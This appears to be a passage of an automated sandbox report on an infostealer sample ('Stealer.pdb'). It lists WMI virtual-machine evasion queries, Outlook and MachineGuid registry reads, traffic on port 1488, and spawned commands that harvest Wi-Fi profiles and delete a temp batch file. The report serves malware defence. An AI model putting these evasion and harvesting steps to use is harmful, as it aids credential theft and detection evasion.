Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: C:\Users\user\Desktop\VaXmr82RIb.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\VaXmr82RIb.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\VaXmr82RIb.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: VaXmr82RIb.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: VaXmr82RIb.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: VaXmr82RIb.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: System.Xml.pdbHx source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Xml.ni.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: mscorlib.pdb@ source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007DA5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Drawing.pdbRSDSp source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Configuration.pdb0$; source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: Stealer.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: ntkrnlmp.pdb source: VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007DA5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.IO.Compression.pdbu source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Net.Http.pdbMZ source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Net.Http.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Security.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.IO.Compression.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: (3)\Stealer\obj\Release\Stealer.pdb source: VaXmr82RIb.exe
Source:	Binary string: System.Configuration.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Xml.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Core.ni.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: mscorlib.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: (3)\Stealer\obj\Release\Stealer.pdb, source: VaXmr82RIb.exe
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Net.Http.ni.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Management.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Drawing.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: mscorlib.ni.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Management.ni.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Core.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\tdata*4&)G source: VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007DC4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS] source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Management.pdb.> source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Net.Http.ni.pdbRSDS source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.ni.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Security.pdb8 source: WER9BB8.tmp.dmp.17.dr

Source: VaXmr82RIb.exe

Static PE information: 0xF12D1FC7 [Fri Mar 21 18:51:51 2098 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .4j;

Source: VaXmr82RIb.exe	Static PE information: section name: .<':
Source: VaXmr82RIb.exe	Static PE information: section name: .#x#
Source: VaXmr82RIb.exe	Static PE information: section name: .4j;

Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_0360A03C pushfd ; ret		0_2_0360A0C1
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_036216FC push eax; mov dword ptr [esp], ecx		0_2_0362171C

Source: VaXmr82RIb.exe

Static PE information: section name: .4j; entropy: 7.738212847633549

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 1488
Source: unknown	Network traffic detected: HTTP traffic on port 1488 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 1488 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 1488 -> 49747

Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Users\user\Desktop\VaXmr82RIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory

Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)

Source: C:\Users\user\Desktop\VaXmr82RIb.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_PointingDevice

Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)

Source: C:\Users\user\Desktop\VaXmr82RIb.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT EstimatedChargeRemaining, BatteryStatus FROM Win32_Battery

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\VaXmr82RIb.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Model, Size FROM Win32_DiskDrive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\VaXmr82RIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, Speed FROM Win32_NetworkAdapter WHERE MACAddress IS NOT NULL
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Description, MACAddress, IPEnabled FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = TRUE

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Users\user\Desktop\VaXmr82RIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory

Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines)

Source: C:\Users\user\Desktop\VaXmr82RIb.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Default FROM Win32_Printer

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Users\user\Desktop\VaXmr82RIb.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DeviceID, FileSystem, FreeSpace, Size FROM Win32_LogicalDisk WHERE DriveType = 3

Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)

Source: C:\Users\user\Desktop\VaXmr82RIb.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_SoundDevice

Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Memory allocated: 3460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Memory allocated: 3640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Memory allocated: 5640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Memory allocated: 5B20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Memory allocated: 7B20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Memory allocated: 7D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Memory allocated: 9D60000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\VaXmr82RIb.exe

Window / User API: threadDelayed 9772

Jump to behavior

Source: C:\Users\user\Desktop\VaXmr82RIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer, SMBIOSBIOSVersion, ReleaseDate FROM Win32_BIOS
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Product, Manufacturer, SerialNumber FROM Win32_BaseBoard

Source: C:\Users\user\Desktop\VaXmr82RIb.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: VaXmr82RIb.exe	Binary or memory string: IsVirtualMachine
Source: VaXmr82RIb.exe, 00000000.00000002.30073132207.0000000001895000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: VaXmr82RIb.exe	Binary or memory string: <IsVirtualMachine>b__1_0

Source: C:\Users\user\Desktop\VaXmr82RIb.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\VaXmr82RIb.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles \| findstr All	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 3364	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 3364

Jump to behavior

Source: C:\Users\user\Desktop\VaXmr82RIb.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Jump to behavior

Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Queries volume information: C:\Users\user\Desktop\VaXmr82RIb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\VaXmr82RIb.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles

Source: VaXmr82RIb.exe, 00000000.00000002.30087188792.0000000007EF4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: V%ProgramFiles%\Windows Defender\MsMpeng.exe
